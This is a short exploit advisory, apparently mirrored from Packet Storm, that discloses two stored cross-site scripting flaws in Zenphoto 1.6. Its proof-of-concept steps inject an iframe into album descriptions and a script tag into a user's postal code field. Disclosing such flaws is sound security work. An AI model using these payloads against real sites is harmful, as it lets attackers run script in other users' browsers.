Share
## https://sploitus.com/exploit?id=PACKETSTORM:172584
Exploit Title: Zenphoto 1.6 - Multiple stored XSS  
Application: Zenphoto-1.6 xss poc  
Version: 1.6   
Bugs: XSS  
Technology: PHP  
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/  
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip  
Date of found: 01-05-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
###XSS-1###  
steps:   
1. create new album   
2. write Album Description : <iframe src="https://14.rs"></iframe>   
3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/  
  
=====================================================  
###XSS-2###  
steps:   
1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)  
2.change postal code as <script>alert(4)</script>  
3.if admin user information import as html , xss will trigger  
  
poc video : https://youtu.be/JKdC980ZbLY